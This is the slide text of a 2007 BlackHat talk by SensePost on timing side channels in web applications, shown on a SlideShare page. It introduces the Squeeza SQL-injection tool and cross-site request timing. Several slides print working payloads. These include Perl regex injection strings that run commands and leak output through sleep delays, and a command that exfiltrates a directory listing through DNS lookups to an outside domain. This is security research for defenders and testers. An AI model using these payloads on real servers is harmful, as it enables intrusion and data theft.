SlideShare a Scribd company logo

It's all about the timing

SensePost
SensePost

Presentation by Haroon Meer and Marco Slaviero at BlackHat USA in 2007. This presentation is about timing attacks against web applications. Squeeza, a SQLi tool developed by Marco Slaviero that returns data through various channels (dns,timing,http error messages) is introduced. An attack called Cross site request timing is also discussed.

Technology
1 of 46
Download to read offline
Agenda • Who we are • What this talk is about • Why? • Background • Timing as a Channel • Timing as a Vector • Privacy Implications - XSRT? • Another acronym - (D)XSRT! • Conclusion / Questions
Who we are.. • SensePost – Formed in 2000 – Written a few papers.. – Spoken at a few conferences – Written a few books – Done some Training • marco • haroon http://www.sensepost.com/blog
What is this talk about? • Timing Stuff.. • Who should care ? – If you are a developer.. • Awareness of your applications leakage – If you are a Pen-Tester.. • You could be missing attack vectors completely (or stopping short of full ownage when its relatively trivial!) – If you like new acronyms! • X.S.R.T • (D)X.S.R.T
Stepping Back a Little An illustrious history of side channel attacks on computing systems – differential power analysis • hardware – EM radiation emission analysis • hardware – timing analysis • software/hardware
Traditional Timing • Timing has received lots of attention over the years in the area of crypt- analysis – Kocher [1996] • 1st local results against RSA and DH – Brumley & Boneh [2003] • Derived partial RSA over network due to weaknesses in OpenSSL – Bernstein [2004] • Derived full AES key across custom network clients – Percival [2005] • L1 cache access times could be used on HT processors to derive RSA key bits
Web Time • Felten & Schneider [2000] – early results on timing and the web – focused on privacy • browser cache snooping • dns cache snooping • Kinderman [2003] – Java applet in JavaScript
Web Time Point Oh – Grossman & Niedzialkowski [2006] – SPI Dynamics [2006] • Both released a JavaScript port scanner using JS’s onerror feature. Implicitly uses timing attacks (connection timed out, hence it is closed) – Bortz, Boneh & Nandy [2007] • Direct timing (valid usernames, hidden gallery sizes) • Cross Site Timing – <img onerror=xxxxx>
A Communication Channel • A solid channel is a real basic requirement. • A quick progression of remote command execution attacks (relevant to channels)
The App. Is the Channel • Sometimes the application by its nature gives data back to the attacker.. • Command injection • Friendly SQL queries
The App. Is the Channel • Sometimes the firewalling is so poor that the whole things is almost moot! • But we cant count on being that lucky…
The App. Is the Channel • So what happens when it gets a little tighter? $search_term = $user_input; if($recordset =~ /$search_term/ig) do_stuff();
The App. Is the Channel $search_term = $user_input; if($recordset =~ /$search_term/ig) do_stuff(); (?{`uname`;}) (?{`sleep 20`;}) (?{`perl -e 'system("sleep","10");'`;}) (?{`perl -e 'sleep(ord(substr(qx/uname/, 0,1)))'`;})
Proof of my lame’ness wh00t:~/customers/bh haroon$ python timing.py "uname" [*] POST built and encoded [*] Got Response: HTTP/1.1 200 [*] [83.0] seconds [*] ['S'] [*] POST built and encoded [*] Got Response: HTTP/1.1 200 [*] [83.0, 117.0] seconds [*] ['S', 'u'] [*] POST built and encoded [*] Got Response: HTTP/1.1 200 [*] [83.0, 117.0, 110.0] seconds [*] ['S', 'u', 'n'] [*] POST built and encoded [*] Got Response: HTTP/1.1 200 [*] [83.0, 117.0, 110.0, 79.0] seconds [*] ['S', 'u', 'n', 'O'] [*] POST built and encoded [*] Got Response: HTTP/1.1 200 [*] [83.0, 117.0, 110.0, 79.0, 83.0] seconds [*] ['S', 'u', 'n', 'O', 'S'] [*] POST built and encoded [*] Got Response: HTTP/1.1 200 [*] [83.0, 117.0, 110.0, 79.0, 83.0, 10.0] seconds [*] ['S', 'u', 'n', 'O', 'S', 'n']
Proof (II) • Clearly this had issues.. • ord('A') => 65 • unpack(B32, ’A') => 01000001 – Sleep 0 – Sleep 1 – Sleep 0 –…
SQL Injection (Classic) • SQL & WWW Server are the same box.. (same as birdseye) • echo foo > c:inetpubwwwroot..
SQL Injection (same) • But outbound access like this almost never happens anymore..
Confirming execution? • Call home: (ping, smb,nc..etc) • Rudimentary timing: (‘ping -n20 localhost’) • Nslookup:‘nslookup moo_moo.sensepost.com’ • We thought DNS was worth chasing..
Poor mans dns tunnel • for /F "usebackq tokens=1,2,3,4* %i in ('dir c: /b') do nslookup %i.sensepost.com • Works fine for small pieces of data.. • Sucks for anything binary.. • Sucks for anthing over 255 chars
Poor mans dns tunnel • Aka - introducing squeeza • Inspired (in part) by Sec-1 Automagic SQL Injector.. • Provides – Simple shell to pull server-side data into tables (sql query / xp_cmdshell / etc) – Return channel to get inserted data from the server to us – Binary-safe transport – Reliable transport • Requirements – ruby – tcpdump – possibly access to a DNS server – large SQL injection point
Squeeza’s DNS internals 1 Basic Operation: 1. Initial HTTP request pulls data into a predefined table SQCMD. 2. For each row ri in SQCMD, send a HTTP request to: a) chop ri into fixed-size blocks b1, b2, … bn = ri b) For each block bj, convert to hex hj = hex(bj) c) Prepend header to and append domain to hj. d) Initiate DNS lookup for hj. e) Capture the DNS request with Squeeza, decode hex and store the block. 3. If blocks are missing, re-request them.
Squeeza’s DNS internals 2 • Keep in mind that pulling data into the table is not related to extracting it. i.e. the source can vary • The default method of kicking off DNS queries is xp_cmdshell+nslookup. Oftentimes that stored proc isn’t available or allowed. • Can we cause DNS request to be initiated otherwise? 1_29_1_93.0x717171717171717171717171717171717 171717171717171.7171717171.sensepost.com.c$ • Of course! • xp_getfiledetails()
Squeeza demo
Hey!! • I thought this talk was about timing? • SQL Server’s “waitfor delay” • Used by a few injection tools as a boolean operator (sql injector powershell, sqlninja, etc) • If user=sa {waitfor 10}, else{waitfor delay 20} • So… (considering lessons learned from squeeza_I and oneTime.py, we can: – Execute command / extract data into new table – Encode table as binary strings `hostname` = winbox = 01110111 01101001 01101110 01100010 01101111 01111000 – Sleep 0, sleep 2, sleep 2, sleep 0, ..
More proof of my lame’ness • Aka - more squeeza coolness.. • anotherTime.py: • Squeeza’s timing channel:
But how reliable is timing? • Well, that all depends on how reliable your line is • But we can try to accommodate shaky lines and loaded servers with a sprinkling of stats • Basic calibration idea is to collect a sample set of 0-bit and 1-bit requests, discard outliers, apply elementary statistics and derive two landing pads • If the landing pads are far enough apart, we’ll use them, otherwise increase the time delay for 1-bits and re-calibrate
Timing Calibration Request Timings 100 90 80 70 re u n y 60 F qec 0-bit 50 1-bit 40 30 20 10 0 5 15 25 35 45 55 65 75 85 95 5 10 Time in ms 0-bit Discarded 1-bit Discarded 0 time
More squeeza cool’ness • Additional channels • File Transfer. • Modularityness :) • http://www.sensepost.com/research/squ eeza
Timing as its own Vector • Information Leakage is big when Application Testing • (not just because it allows security guys to say “Use generic error messages!”) • This is useful to us as attackers / analysts..
But.. • We have been beating this drum for a bit, • So you see it less frequently in the wild, • But.. – Subtle timing differences are sometimes present, – We just haven't been listening.. – Hardware security Tokens (longer round trip times)
Timing failed logins • Perfect example of what we discussed.. • Can you spot it ? • We thought it was pretty cool at the time.. (yetAnotherTime.py)
Why is this scary? • We took a quick look at most popular application scanners out there.. • None made any reference at all to caring about timing at all.. • We built it into Suru (but to be honest, only since we discovered timing love!) • Do it manually, buy Suru, or step on your app-scan vendors!
Timing and Privacy • Same Origin Policy: • The point was simple: Don’t let site- A get results from site-B unless they are related.. • So how did Jeremiah (and friends) do all that port-scanning coolness? – They used JavaScript onLoad() and onError() events to determine if they can access a host:port – Variation with CSS and link visited followed.
Timing and Privacy • Portscanning was soon followed by History checking: • Using CSS to determine if links were visited. • Ed Felten in 2000 examined the dangers of Java and Timing to users Privacy by timing load times. • Felten’s 2000 Timing Attack on Privacy.
We thought • We thought we invented a new acronym.. • XSRT - Cross Site Request Timing.. – We were wrong: (Andrew Bortz - 2007) – Exactly the same attack: (Are you currently logged into linkedin / myspace / facebook / bank.com / internetbanking?) • Example: – Fetch (http://www.facebook.com/friends.php?r)
X.S.R.T • Cross Site Request Timing.. • Simply: • Victim visits attackers website (or site with attackers JS) • JavaScript causes Victims browser to surf to http://www.facebook.com/friends.php?r • JavaScript determines load time, to decide if user is (or isnt logged in) (> 50ms - user logged in) • Problem: This doesn’t work the same for U.S victims and .ZA victims! (.za adds 100ms just by default!)
X.S.R.T • We introduce the concept of a base- page 1. Fetch page available to both Logged-in and Logged-out users (base-page) (X Seconds) 2. Fetch the page available only to Logged-in users (Y Seconds) 3. Calculate X/Y • This gives us a latency resistant method of determining logged- in/logged-out status • (What about cached pages?)
• Wow! We can tell a user if he is or isnt logged into mailbox? • (Can we determine this remotely?)
So.. • Lets summarize this quickly.. – We know some sites will betray valid usernames through timing differences – We know that (most) sites will betray a valid login from an invalid one based on timing.. – We know we can use your browser to time stuff while you are surfing..
Hampster!! QuickTime™ and a xvid decompressor are needed to see this picture.
(D) X.S.R.T • (Re)Introducing: • Distributed Cross Site Request Timing • Lets take it in stages: – Recall the timing script we ran against the Internet Banking site (timing.py) – We can implement that in JavaScript (so instead of running it from through python on my box, I can run it in JavaScript on your box!) – A small time granularity problem!
A More Granular Timer? // pdp architects code to obtain local browser IP Address func t io n g et Net In fo() { var s o ck = n e w ja va.net .So ck e t(); so ck.bi n d(n e w jav a .ne t .In e tSo cketA dd ress( '0. 0 .0 .0', 0)); so ck. con n e ct(n e w java.net .Ine tSoc ke t Address (d o cum e nt .domain , (!d o cum e nt .lo cat io n.po rt)?8 0: d o cum e nt. loc a ti o n. p or t )); ret u rn {doma in: so ck .get LocalAd d res s ().g e t Ho stNam e (), ip: so ck. g etL o calAdd ress( ).g et Ho s tAdd re ss()}; } So: nanoTime() from java.lang.System
(D) X.S.R.T • Distributed Cross Site Request Timing • Lets take it in stages: – Recall the timing script we ran against the Internet Banking site (timing.py) – We can implement that in JavaScript (so instead of running it from through python on my box, I can run it in JavaScript on your box!) – A small time granularity problem! (No problem!) – timing.py => timing.js :) – Runs in your browser, Reports success to Attackers Machine
(D) X.S.R.T
Conclusion. • Developers: – Make sure you are not throwing away valuable intel through timing delta’s – Investigate the standard XSRF detection techniques • Network Security Admins: – Re-examine least privelege, Does your SQL Server need DNS? – Does your IDS detect spurious DNS requests? (to your own DNS Server?) – Would you spot the Timing Attacks in your logs? • Pen-Testers / Researchers: – XSS + Header Injection.. – Grab a copy of squeeza from http://www.sensepost.com/research/squeeza – Add modules / Drop us feedback • All: – Feedback – http://www.sensepost.com/blog
Questions ???

Recommended

The Year of JRuby - RubyC 2018
The Year of JRuby - RubyC 2018The Year of JRuby - RubyC 2018
The Year of JRuby - RubyC 2018
Charles Nutter
 
Rocket Fuelled Cucumbers
Rocket Fuelled CucumbersRocket Fuelled Cucumbers
Rocket Fuelled Cucumbers
Joseph Wilk
 
Life Cycle of Metrics, Alerting, and Performance Monitoring in Microservices
Life Cycle of Metrics, Alerting, and Performance Monitoring in MicroservicesLife Cycle of Metrics, Alerting, and Performance Monitoring in Microservices
Life Cycle of Metrics, Alerting, and Performance Monitoring in Microservices
Sean Chittenden
 
Terracotta And Hibernate
Terracotta And HibernateTerracotta And Hibernate
Terracotta And Hibernate
Taylor Gautier
 
Solaris DTrace, An Introduction
Solaris DTrace, An IntroductionSolaris DTrace, An Introduction
Solaris DTrace, An Introduction
satyajit_t
 
Down the Rabbit Hole: An Adventure in JVM Wonderland
Down the Rabbit Hole: An Adventure in JVM WonderlandDown the Rabbit Hole: An Adventure in JVM Wonderland
Down the Rabbit Hole: An Adventure in JVM Wonderland
Charles Nutter
 
Shall we play a game?
Shall we play a game?Shall we play a game?
Shall we play a game?
Maciej Lasyk
 
Distributed Lock Manager
Distributed Lock ManagerDistributed Lock Manager
Distributed Lock Manager
Hao Chen
 

Recommended

The Year of JRuby - RubyC 2018
The Year of JRuby - RubyC 2018The Year of JRuby - RubyC 2018
The Year of JRuby - RubyC 2018
Charles Nutter
 
Rocket Fuelled Cucumbers
Rocket Fuelled CucumbersRocket Fuelled Cucumbers
Rocket Fuelled Cucumbers
Joseph Wilk
 
Life Cycle of Metrics, Alerting, and Performance Monitoring in Microservices
Life Cycle of Metrics, Alerting, and Performance Monitoring in MicroservicesLife Cycle of Metrics, Alerting, and Performance Monitoring in Microservices
Life Cycle of Metrics, Alerting, and Performance Monitoring in Microservices
Sean Chittenden
 
Terracotta And Hibernate
Terracotta And HibernateTerracotta And Hibernate
Terracotta And Hibernate
Taylor Gautier
 
Solaris DTrace, An Introduction
Solaris DTrace, An IntroductionSolaris DTrace, An Introduction
Solaris DTrace, An Introduction
satyajit_t
 
Down the Rabbit Hole: An Adventure in JVM Wonderland
Down the Rabbit Hole: An Adventure in JVM WonderlandDown the Rabbit Hole: An Adventure in JVM Wonderland
Down the Rabbit Hole: An Adventure in JVM Wonderland
Charles Nutter
 
Shall we play a game?
Shall we play a game?Shall we play a game?
Shall we play a game?
Maciej Lasyk
 
Distributed Lock Manager
Distributed Lock ManagerDistributed Lock Manager
Distributed Lock Manager
Hao Chen
 
Sensepost assessment automation
Sensepost assessment automationSensepost assessment automation
Sensepost assessment automation
SensePost
 
Threats to machine clouds
Threats to machine cloudsThreats to machine clouds
Threats to machine clouds
SensePost
 
Putting the tea back into cyber terrorism
Putting the tea back into cyber terrorismPutting the tea back into cyber terrorism
Putting the tea back into cyber terrorism
SensePost
 
A new look into web application reconnaissance
A new look into web application reconnaissance A new look into web application reconnaissance
A new look into web application reconnaissance
SensePost
 
Web 2.0 security woes
Web 2.0 security woesWeb 2.0 security woes
Web 2.0 security woes
SensePost
 
Denial of services : limiting the threat
Denial of services : limiting the threatDenial of services : limiting the threat
Denial of services : limiting the threat
SensePost
 
Attacks and Defences
Attacks and DefencesAttacks and Defences
Attacks and Defences
SensePost
 
A Brave New World
A Brave New WorldA Brave New World
A Brave New World
SensePost
 
State of the information security nation
State of the information security nationState of the information security nation
State of the information security nation
SensePost
 
Multithreading and Parallelism on iOS [MobOS 2013]
Multithreading and Parallelism on iOS [MobOS 2013] Multithreading and Parallelism on iOS [MobOS 2013]
Multithreading and Parallelism on iOS [MobOS 2013]
Kuba Břečka
 
Tanel Poder - Troubleshooting Complex Oracle Performance Issues - Part 1
Tanel Poder - Troubleshooting Complex Oracle Performance Issues - Part 1Tanel Poder - Troubleshooting Complex Oracle Performance Issues - Part 1
Tanel Poder - Troubleshooting Complex Oracle Performance Issues - Part 1
Tanel Poder
 
You didnt see it’s coming? "Dawn of hardened Windows Kernel"
You didnt see it’s coming? "Dawn of hardened Windows Kernel" You didnt see it’s coming? "Dawn of hardened Windows Kernel"
You didnt see it’s coming? "Dawn of hardened Windows Kernel"
Peter Hlavaty
 
Capacity Planning for fun & profit
Capacity Planning for fun & profitCapacity Planning for fun & profit
Capacity Planning for fun & profit
Rodrigo Campos
 
JavaOne 2010: Top 10 Causes for Java Issues in Production and What to Do When...
JavaOne 2010: Top 10 Causes for Java Issues in Production and What to Do When...JavaOne 2010: Top 10 Causes for Java Issues in Production and What to Do When...
JavaOne 2010: Top 10 Causes for Java Issues in Production and What to Do When...
srisatish ambati
 
Hotsos 2012
Hotsos 2012Hotsos 2012
Hotsos 2012
Connor McDonald
 
Scaling real world applications using gevent
Scaling real world applications using geventScaling real world applications using gevent
Scaling real world applications using gevent
aalokthemagnificient
 
Tunning mobicent-jean deruelle
Tunning mobicent-jean deruelleTunning mobicent-jean deruelle
Tunning mobicent-jean deruelle
Ivelin Ivanov
 
Run Node Run
Run Node RunRun Node Run
Run Node Run
Kevin Swiber
 
Bit_Bucket_x31_Final
Bit_Bucket_x31_FinalBit_Bucket_x31_Final
Bit_Bucket_x31_Final
Sam Knutson
 
Hacklu2011 tricaud
Hacklu2011 tricaudHacklu2011 tricaud
Hacklu2011 tricaud
stricaud
 
Php johannesburg meetup - talk 2014 - scaling php in the enterprise
Php johannesburg meetup - talk 2014 - scaling php in the enterprisePhp johannesburg meetup - talk 2014 - scaling php in the enterprise
Php johannesburg meetup - talk 2014 - scaling php in the enterprise
Sarel van der Walt
 
Stealing from Thieves: Breaking IonCUBE VM to RE Exploit Kits
Stealing from Thieves: Breaking IonCUBE VM to RE Exploit KitsStealing from Thieves: Breaking IonCUBE VM to RE Exploit Kits
Stealing from Thieves: Breaking IonCUBE VM to RE Exploit Kits
Мохачёк Сахер
 

More Related Content

Viewers also liked

Sensepost assessment automation
Sensepost assessment automationSensepost assessment automation
Sensepost assessment automation
SensePost
 
Threats to machine clouds
Threats to machine cloudsThreats to machine clouds
Threats to machine clouds
SensePost
 
Putting the tea back into cyber terrorism
Putting the tea back into cyber terrorismPutting the tea back into cyber terrorism
Putting the tea back into cyber terrorism
SensePost
 
A new look into web application reconnaissance
A new look into web application reconnaissance A new look into web application reconnaissance
A new look into web application reconnaissance
SensePost
 
Web 2.0 security woes
Web 2.0 security woesWeb 2.0 security woes
Web 2.0 security woes
SensePost
 
Denial of services : limiting the threat
Denial of services : limiting the threatDenial of services : limiting the threat
Denial of services : limiting the threat
SensePost
 
Attacks and Defences
Attacks and DefencesAttacks and Defences
Attacks and Defences
SensePost
 
A Brave New World
A Brave New WorldA Brave New World
A Brave New World
SensePost
 
State of the information security nation
State of the information security nationState of the information security nation
State of the information security nation
SensePost
 

Viewers also liked (9)

Sensepost assessment automation
Sensepost assessment automationSensepost assessment automation
Sensepost assessment automation
 
Threats to machine clouds
Threats to machine cloudsThreats to machine clouds
Threats to machine clouds
 
Putting the tea back into cyber terrorism
Putting the tea back into cyber terrorismPutting the tea back into cyber terrorism
Putting the tea back into cyber terrorism
 
A new look into web application reconnaissance
A new look into web application reconnaissance A new look into web application reconnaissance
A new look into web application reconnaissance
 
Web 2.0 security woes
Web 2.0 security woesWeb 2.0 security woes
Web 2.0 security woes
 
Denial of services : limiting the threat
Denial of services : limiting the threatDenial of services : limiting the threat
Denial of services : limiting the threat
 
Attacks and Defences
Attacks and DefencesAttacks and Defences
Attacks and Defences
 
A Brave New World
A Brave New WorldA Brave New World
A Brave New World
 
State of the information security nation
State of the information security nationState of the information security nation
State of the information security nation
 

Similar to It's all about the timing

Multithreading and Parallelism on iOS [MobOS 2013]
Multithreading and Parallelism on iOS [MobOS 2013] Multithreading and Parallelism on iOS [MobOS 2013]
Multithreading and Parallelism on iOS [MobOS 2013]
Kuba Břečka
 
Tanel Poder - Troubleshooting Complex Oracle Performance Issues - Part 1
Tanel Poder - Troubleshooting Complex Oracle Performance Issues - Part 1Tanel Poder - Troubleshooting Complex Oracle Performance Issues - Part 1
Tanel Poder - Troubleshooting Complex Oracle Performance Issues - Part 1
Tanel Poder
 
You didnt see it’s coming? "Dawn of hardened Windows Kernel"
You didnt see it’s coming? "Dawn of hardened Windows Kernel" You didnt see it’s coming? "Dawn of hardened Windows Kernel"
You didnt see it’s coming? "Dawn of hardened Windows Kernel"
Peter Hlavaty
 
Capacity Planning for fun & profit
Capacity Planning for fun & profitCapacity Planning for fun & profit
Capacity Planning for fun & profit
Rodrigo Campos
 
JavaOne 2010: Top 10 Causes for Java Issues in Production and What to Do When...
JavaOne 2010: Top 10 Causes for Java Issues in Production and What to Do When...JavaOne 2010: Top 10 Causes for Java Issues in Production and What to Do When...
JavaOne 2010: Top 10 Causes for Java Issues in Production and What to Do When...
srisatish ambati
 
Hotsos 2012
Hotsos 2012Hotsos 2012
Hotsos 2012
Connor McDonald
 
Scaling real world applications using gevent
Scaling real world applications using geventScaling real world applications using gevent
Scaling real world applications using gevent
aalokthemagnificient
 
Tunning mobicent-jean deruelle
Tunning mobicent-jean deruelleTunning mobicent-jean deruelle
Tunning mobicent-jean deruelle
Ivelin Ivanov
 
Run Node Run
Run Node RunRun Node Run
Run Node Run
Kevin Swiber
 
Bit_Bucket_x31_Final
Bit_Bucket_x31_FinalBit_Bucket_x31_Final
Bit_Bucket_x31_Final
Sam Knutson
 
Hacklu2011 tricaud
Hacklu2011 tricaudHacklu2011 tricaud
Hacklu2011 tricaud
stricaud
 
Php johannesburg meetup - talk 2014 - scaling php in the enterprise
Php johannesburg meetup - talk 2014 - scaling php in the enterprisePhp johannesburg meetup - talk 2014 - scaling php in the enterprise
Php johannesburg meetup - talk 2014 - scaling php in the enterprise
Sarel van der Walt
 
Stealing from Thieves: Breaking IonCUBE VM to RE Exploit Kits
Stealing from Thieves: Breaking IonCUBE VM to RE Exploit KitsStealing from Thieves: Breaking IonCUBE VM to RE Exploit Kits
Stealing from Thieves: Breaking IonCUBE VM to RE Exploit Kits
Мохачёк Сахер
 
Scaling real world applications using gevent
Scaling real world applications using geventScaling real world applications using gevent
Scaling real world applications using gevent
aalokthemagnificient
 
SDAccel Design Contest: Vivado HLS
SDAccel Design Contest: Vivado HLSSDAccel Design Contest: Vivado HLS
SDAccel Design Contest: Vivado HLS
NECST Lab @ Politecnico di Milano
 
What We Learned About Cassandra While Building go90 (Christopher Webster & Th...
What We Learned About Cassandra While Building go90 (Christopher Webster & Th...What We Learned About Cassandra While Building go90 (Christopher Webster & Th...
What We Learned About Cassandra While Building go90 (Christopher Webster & Th...
DataStax
 
Load testing with Blitz
Load testing with BlitzLoad testing with Blitz
Load testing with Blitz
Lindsay Holmwood
 
WTF is Twisted?
WTF is Twisted?WTF is Twisted?
WTF is Twisted?
hawkowl
 
SMP implementation for OpenBSD/sgi
SMP implementation for OpenBSD/sgiSMP implementation for OpenBSD/sgi
SMP implementation for OpenBSD/sgi
Takuya ASADA
 
Ruby and Distributed Storage Systems
Ruby and Distributed Storage SystemsRuby and Distributed Storage Systems
Ruby and Distributed Storage Systems
SATOSHI TAGOMORI
 

Similar to It's all about the timing (20)

Multithreading and Parallelism on iOS [MobOS 2013]
Multithreading and Parallelism on iOS [MobOS 2013] Multithreading and Parallelism on iOS [MobOS 2013]
Multithreading and Parallelism on iOS [MobOS 2013]
 
Tanel Poder - Troubleshooting Complex Oracle Performance Issues - Part 1
Tanel Poder - Troubleshooting Complex Oracle Performance Issues - Part 1Tanel Poder - Troubleshooting Complex Oracle Performance Issues - Part 1
Tanel Poder - Troubleshooting Complex Oracle Performance Issues - Part 1
 
You didnt see it’s coming? "Dawn of hardened Windows Kernel"
You didnt see it’s coming? "Dawn of hardened Windows Kernel" You didnt see it’s coming? "Dawn of hardened Windows Kernel"
You didnt see it’s coming? "Dawn of hardened Windows Kernel"
 
Capacity Planning for fun & profit
Capacity Planning for fun & profitCapacity Planning for fun & profit
Capacity Planning for fun & profit
 
JavaOne 2010: Top 10 Causes for Java Issues in Production and What to Do When...
JavaOne 2010: Top 10 Causes for Java Issues in Production and What to Do When...JavaOne 2010: Top 10 Causes for Java Issues in Production and What to Do When...
JavaOne 2010: Top 10 Causes for Java Issues in Production and What to Do When...
 
Hotsos 2012
Hotsos 2012Hotsos 2012
Hotsos 2012
 
Scaling real world applications using gevent
Scaling real world applications using geventScaling real world applications using gevent
Scaling real world applications using gevent
 
Tunning mobicent-jean deruelle
Tunning mobicent-jean deruelleTunning mobicent-jean deruelle
Tunning mobicent-jean deruelle
 
Run Node Run
Run Node RunRun Node Run
Run Node Run
 
Bit_Bucket_x31_Final
Bit_Bucket_x31_FinalBit_Bucket_x31_Final
Bit_Bucket_x31_Final
 
Hacklu2011 tricaud
Hacklu2011 tricaudHacklu2011 tricaud
Hacklu2011 tricaud
 
Php johannesburg meetup - talk 2014 - scaling php in the enterprise
Php johannesburg meetup - talk 2014 - scaling php in the enterprisePhp johannesburg meetup - talk 2014 - scaling php in the enterprise
Php johannesburg meetup - talk 2014 - scaling php in the enterprise
 
Stealing from Thieves: Breaking IonCUBE VM to RE Exploit Kits
Stealing from Thieves: Breaking IonCUBE VM to RE Exploit KitsStealing from Thieves: Breaking IonCUBE VM to RE Exploit Kits
Stealing from Thieves: Breaking IonCUBE VM to RE Exploit Kits
 
Scaling real world applications using gevent
Scaling real world applications using geventScaling real world applications using gevent
Scaling real world applications using gevent
 
SDAccel Design Contest: Vivado HLS
SDAccel Design Contest: Vivado HLSSDAccel Design Contest: Vivado HLS
SDAccel Design Contest: Vivado HLS
 
What We Learned About Cassandra While Building go90 (Christopher Webster & Th...
What We Learned About Cassandra While Building go90 (Christopher Webster & Th...What We Learned About Cassandra While Building go90 (Christopher Webster & Th...
What We Learned About Cassandra While Building go90 (Christopher Webster & Th...
 
Load testing with Blitz
Load testing with BlitzLoad testing with Blitz
Load testing with Blitz
 
WTF is Twisted?
WTF is Twisted?WTF is Twisted?
WTF is Twisted?
 
SMP implementation for OpenBSD/sgi
SMP implementation for OpenBSD/sgiSMP implementation for OpenBSD/sgi
SMP implementation for OpenBSD/sgi
 
Ruby and Distributed Storage Systems
Ruby and Distributed Storage SystemsRuby and Distributed Storage Systems
Ruby and Distributed Storage Systems
 

More from SensePost

objection - runtime mobile exploration
objection - runtime mobile explorationobjection - runtime mobile exploration
objection - runtime mobile exploration
SensePost
 
Vulnerabilities in TN3270 based Application
Vulnerabilities in TN3270 based ApplicationVulnerabilities in TN3270 based Application
Vulnerabilities in TN3270 based Application
SensePost
 
Ruler and Liniaal @ Troopers 17
Ruler and Liniaal @ Troopers 17Ruler and Liniaal @ Troopers 17
Ruler and Liniaal @ Troopers 17
SensePost
 
Introducing (DET) the Data Exfiltration Toolkit
Introducing (DET) the Data Exfiltration ToolkitIntroducing (DET) the Data Exfiltration Toolkit
Introducing (DET) the Data Exfiltration Toolkit
SensePost
 
ZaCon 2015 - Zombie Mana Attacks
ZaCon 2015 - Zombie Mana AttacksZaCon 2015 - Zombie Mana Attacks
ZaCon 2015 - Zombie Mana Attacks
SensePost
 
Improvement in Rogue Access Points - SensePost Defcon 22
Improvement in Rogue Access Points - SensePost Defcon 22Improvement in Rogue Access Points - SensePost Defcon 22
Improvement in Rogue Access Points - SensePost Defcon 22
SensePost
 
Heartbleed Overview
Heartbleed OverviewHeartbleed Overview
Heartbleed Overview
SensePost
 
Botconf 2013 - DNS-based Botnet C2 Server Detection
Botconf 2013 - DNS-based Botnet C2 Server DetectionBotconf 2013 - DNS-based Botnet C2 Server Detection
Botconf 2013 - DNS-based Botnet C2 Server Detection
SensePost
 
Rat a-tat-tat
Rat a-tat-tatRat a-tat-tat
Rat a-tat-tat
SensePost
 
Hacking Z-Wave Home Automation Systems
Hacking Z-Wave Home Automation SystemsHacking Z-Wave Home Automation Systems
Hacking Z-Wave Home Automation Systems
SensePost
 
Offence oriented Defence
Offence oriented DefenceOffence oriented Defence
Offence oriented Defence
SensePost
 
Inside .NET Smart Card Operating System
Inside .NET Smart Card Operating SystemInside .NET Smart Card Operating System
Inside .NET Smart Card Operating System
SensePost
 
SNMP : Simple Network Mediated (Cisco) Pwnage
SNMP : Simple Network Mediated (Cisco) PwnageSNMP : Simple Network Mediated (Cisco) Pwnage
SNMP : Simple Network Mediated (Cisco) Pwnage
SensePost
 
Its Ok To Get Hacked
Its Ok To Get HackedIts Ok To Get Hacked
Its Ok To Get Hacked
SensePost
 
Web Application Hacking
Web Application HackingWeb Application Hacking
Web Application Hacking
SensePost
 
Major global information security trends - a summary
Major global information security trends - a summaryMajor global information security trends - a summary
Major global information security trends - a summary
SensePost
 
Corporate Threat Modeling v2
Corporate Threat Modeling v2Corporate Threat Modeling v2
Corporate Threat Modeling v2
SensePost
 
OK I'm here, so what's in it for me?
OK I'm here, so what's in it for me?OK I'm here, so what's in it for me?
OK I'm here, so what's in it for me?
SensePost
 
Security threats facing SA businessess
Security threats facing SA businessessSecurity threats facing SA businessess
Security threats facing SA businessess
SensePost
 
Security in e-commerce
Security in e-commerceSecurity in e-commerce
Security in e-commerce
SensePost
 

More from SensePost (20)

objection - runtime mobile exploration
objection - runtime mobile explorationobjection - runtime mobile exploration
objection - runtime mobile exploration
 
Vulnerabilities in TN3270 based Application
Vulnerabilities in TN3270 based ApplicationVulnerabilities in TN3270 based Application
Vulnerabilities in TN3270 based Application
 
Ruler and Liniaal @ Troopers 17
Ruler and Liniaal @ Troopers 17Ruler and Liniaal @ Troopers 17
Ruler and Liniaal @ Troopers 17
 
Introducing (DET) the Data Exfiltration Toolkit
Introducing (DET) the Data Exfiltration ToolkitIntroducing (DET) the Data Exfiltration Toolkit
Introducing (DET) the Data Exfiltration Toolkit
 
ZaCon 2015 - Zombie Mana Attacks
ZaCon 2015 - Zombie Mana AttacksZaCon 2015 - Zombie Mana Attacks
ZaCon 2015 - Zombie Mana Attacks
 
Improvement in Rogue Access Points - SensePost Defcon 22
Improvement in Rogue Access Points - SensePost Defcon 22Improvement in Rogue Access Points - SensePost Defcon 22
Improvement in Rogue Access Points - SensePost Defcon 22
 
Heartbleed Overview
Heartbleed OverviewHeartbleed Overview
Heartbleed Overview
 
Botconf 2013 - DNS-based Botnet C2 Server Detection
Botconf 2013 - DNS-based Botnet C2 Server DetectionBotconf 2013 - DNS-based Botnet C2 Server Detection
Botconf 2013 - DNS-based Botnet C2 Server Detection
 
Rat a-tat-tat
Rat a-tat-tatRat a-tat-tat
Rat a-tat-tat
 
Hacking Z-Wave Home Automation Systems
Hacking Z-Wave Home Automation SystemsHacking Z-Wave Home Automation Systems
Hacking Z-Wave Home Automation Systems
 
Offence oriented Defence
Offence oriented DefenceOffence oriented Defence
Offence oriented Defence
 
Inside .NET Smart Card Operating System
Inside .NET Smart Card Operating SystemInside .NET Smart Card Operating System
Inside .NET Smart Card Operating System
 
SNMP : Simple Network Mediated (Cisco) Pwnage
SNMP : Simple Network Mediated (Cisco) PwnageSNMP : Simple Network Mediated (Cisco) Pwnage
SNMP : Simple Network Mediated (Cisco) Pwnage
 
Its Ok To Get Hacked
Its Ok To Get HackedIts Ok To Get Hacked
Its Ok To Get Hacked
 
Web Application Hacking
Web Application HackingWeb Application Hacking
Web Application Hacking
 
Major global information security trends - a summary
Major global information security trends - a summaryMajor global information security trends - a summary
Major global information security trends - a summary
 
Corporate Threat Modeling v2
Corporate Threat Modeling v2Corporate Threat Modeling v2
Corporate Threat Modeling v2
 
OK I'm here, so what's in it for me?
OK I'm here, so what's in it for me?OK I'm here, so what's in it for me?
OK I'm here, so what's in it for me?
 
Security threats facing SA businessess
Security threats facing SA businessessSecurity threats facing SA businessess
Security threats facing SA businessess
 
Security in e-commerce
Security in e-commerceSecurity in e-commerce
Security in e-commerce
 

Recently uploaded

"$10 thousand per minute of downtime: architecture, queues, streaming and fin...
